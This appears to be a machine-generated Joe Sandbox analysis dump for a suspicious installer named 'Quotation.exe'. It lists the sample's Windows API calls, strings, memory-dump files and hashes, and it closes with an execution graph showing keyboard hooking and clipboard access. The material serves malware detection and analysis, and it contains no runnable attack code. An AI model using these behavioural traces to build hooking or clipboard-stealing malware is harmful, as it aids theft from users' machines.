                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF822F1
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF82326
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Free$Alloc
                                                                                            • String ID: s<u
                                                                                            • API String ID: 1780285237-779365171
                                                                                            • Opcode ID: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
                                                                                            • Instruction ID: 63cc8096b8e2e04cd55d6496d8c0e8f0a395b888bd882e68a68dd1d82578f38f
                                                                                            • Opcode Fuzzy Hash: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
                                                                                            • Instruction Fuzzy Hash: F531E232114601EBEB258F68C958FBBB7B8FF47325B000269F431D62A0DB72A460DB61
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                            • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                            • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                            Strings
                                                                                            • *?|<>/":, xrefs: 00406D7F
                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                            • API String ID: 589700163-776222514
                                                                                            • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                            • Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
                                                                                            • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                            • Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                            • Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
                                                                                            • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                            • Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
                                                                                            • MulDiv.KERNEL32(00124320,00000064,00124320), ref: 00403673
                                                                                            • wsprintfW.USER32 ref: 00403683
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403693
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 0040367D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                            • Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
                                                                                            • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                            • Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF8116B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF811AE
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF811CD
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF811E6
                                                                                            • GlobalFree.KERNEL32 ref: 6FF8125C
                                                                                            • GlobalFree.KERNEL32(?), ref: 6FF812A7
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF812BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Free$Alloc
                                                                                            • String ID:
                                                                                            • API String ID: 1780285237-0
                                                                                            • Opcode ID: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
                                                                                            • Instruction ID: a9c55cd3b43aab519c6e23a22b833c370c45884679d2246364a95b347d9fbef8
                                                                                            • Opcode Fuzzy Hash: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
                                                                                            • Instruction Fuzzy Hash: 3351B0725107029FCB10CF68D840AAA77B8FF4A324B14062AF975DB360E735E910CB91
                                                                                            APIs
                                                                                            • wsprintfW.USER32 ref: 6FF81F51
                                                                                            • lstrcpyW.KERNEL32(?,error,00001018,6FF81765,00000000,?), ref: 6FF81F71
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcpywsprintf
                                                                                            • String ID: callback%d$error$s<u
                                                                                            • API String ID: 2408954437-3671815815
                                                                                            • Opcode ID: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
                                                                                            • Instruction ID: f4cac8586b14cb935a76d3bfc18b0729edd23c7970dc066855d7a720b102e69b
                                                                                            • Opcode Fuzzy Hash: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
                                                                                            • Instruction Fuzzy Hash: 96F01C35204110AFD7088B18D948EBB73B9FF8A314F0586A8F9799B311C774AC549B91
                                                                                            APIs
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF821BF
                                                                                              • Part of subcall function 6FF812E1: lstrcpynW.KERNEL32(00000000,?,6FF8156A,?,6FF811C4,-000000A0), ref: 6FF812F1
                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 6FF8212C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF8214C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                            • String ID:
                                                                                            • API String ID: 4216380887-0
                                                                                            • Opcode ID: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
                                                                                            • Instruction ID: 3bd90ac4521c95a5520b4500b78554f18e6933d52fa9941e42d3f68046f79865
                                                                                            • Opcode Fuzzy Hash: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
                                                                                            • Instruction Fuzzy Hash: A541F372405B05EFC7009F68C944BEA7BB8FF06354B94033EE979DA289D7727590CAA0
                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FF82B4C,00000000,00000808), ref: 6FF81F8C
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FF81F97
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF81FAB
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 6FF81FB6
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF81FBF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                            • String ID:
                                                                                            • API String ID: 1148316912-0
                                                                                            • Opcode ID: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
                                                                                            • Instruction ID: 1426c93540283eff0f520808fc03329eb2d6bb3224e15093e3a8d5941e0f5cc6
                                                                                            • Opcode Fuzzy Hash: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
                                                                                            • Instruction Fuzzy Hash: D5F0C032118528BBCA101AE7DC0CE67BEBCFB8B6FAB160215F629D13B0D56268109771
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
                                                                                            • CharPrevW.USER32(?,00000000), ref: 00406545
                                                                                            • lstrcatW.KERNEL32(?,004082B0), ref: 00406557
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406534
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-297319885
                                                                                            • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                            • Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
                                                                                            • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                            • Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeGlobal$__alldvrm
                                                                                            • String ID:
                                                                                            • API String ID: 482422042-0
                                                                                            • Opcode ID: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
                                                                                            • Instruction ID: b1a424f18152a33c41ba0db97387f50b6f2739dad30f1e9e4ffcc0c26ba8837b
                                                                                            • Opcode Fuzzy Hash: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
                                                                                            • Instruction Fuzzy Hash: 035107737483068B97149E798984ABA77F6BFCA714B104B2EF072C7350F7A1F9858252
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000), ref: 00403378
                                                                                            • GetTickCount.KERNEL32 ref: 00403397
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004033C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                            • Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
                                                                                            • Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                            • Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406CF4
                                                                                            • CharPrevW.USER32(?,00000000), ref: 00406D05
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-2743851969
                                                                                            • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                            • Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
                                                                                            • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                            • Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

                                                                                            Execution Graph

                                                                                            Execution Coverage:10%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:117
                                                                                            Total number of Limit Nodes:10
                                                                                            execution_graph 44197 3b677260 44200 3b677268 44197->44200 44199 3b67728b 44200->44199 44201 3b675ce4 44200->44201 44202 3b6772a0 KiUserCallbackDispatcher 44201->44202 44204 3b67730e 44202->44204 44204->44200 44306 3b6797f0 44307 3b679834 SetWindowsHookExA 44306->44307 44309 3b67987a 44307->44309 44310 3b677cb0 44311 3b677d0a OleGetClipboard 44310->44311 44312 3b677d4a 44311->44312 44312->44312 44313 3b675e90 44314 3b675ed6 GetCurrentProcess 44313->44314 44316 3b675f28 GetCurrentThread 44314->44316 44318 3b675f21 44314->44318 44317 3b675f65 GetCurrentProcess 44316->44317 44319 3b675f5e 44316->44319 44322 3b675f9b 44317->44322 44318->44316 44319->44317 44320 3b675fc3 GetCurrentThreadId 44321 3b675ff4 44320->44321 44322->44320 44205 ad044 44206 ad05c 44205->44206 44207 ad0b6 44206->44207 44212 3b672522 44206->44212 44216 3b67061c 44206->44216 44227 3b672530 44206->44227 44231 3b676cb2 44206->44231 44213 3b672531 44212->44213 44214 3b67061c 3 API calls 44213->44214 44215 3b672577 44214->44215 44215->44207 44217 3b670627 44216->44217 44218 3b676d41 44217->44218 44220 3b676d31 44217->44220 44221 3b676d3f 44218->44221 44266 3b675c8c 44218->44266 44242 3b7d1270 44220->44242 44247 3b7d1344 44220->44247 44253 3b7d1278 44220->44253 44258 3b676e68 44220->44258 44262 3b676e58 44220->44262 44228 3b672556 44227->44228 44229 3b67061c 3 API calls 44228->44229 44230 3b672577 44229->44230 44230->44207 44232 3b676d0d 44231->44232 44233 3b676d41 44232->44233 44235 3b676d31 44232->44235 44234 3b675c8c 3 API calls 44233->44234 44236 3b676d3f 44233->44236 44234->44236 44237 3b7d1278 3 API calls 44235->44237 44238 3b7d1344 3 API calls 44235->44238 44239 3b7d1270 3 API calls 44235->44239 44240 3b676e68 3 API calls 44235->44240 44241 3b676e58 3 API calls 44235->44241 44237->44236 44238->44236 44239->44236 44240->44236 44241->44236 44243 3b7d128c 44242->44243 44273 3b7d131f 44243->44273 44277 3b7d1330 44243->44277 44244 3b7d1318 44244->44221 44248 3b7d1302 44247->44248 44249 3b7d1352 44247->44249 44251 3b7d131f 3 API calls 44248->44251 44252 3b7d1330 3 API calls 44248->44252 44250 3b7d1318 44250->44221 44251->44250 44252->44250 44254 3b7d128c 44253->44254 44256 3b7d131f 3 API calls 44254->44256 44257 3b7d1330 3 API calls 44254->44257 44255 3b7d1318 44255->44221 44256->44255 44257->44255 44259 3b676e76 44258->44259 44260 3b675c8c 3 API calls 44259->44260 44261 3b676f4e 44259->44261 44260->44259 44261->44221 44264 3b676e68 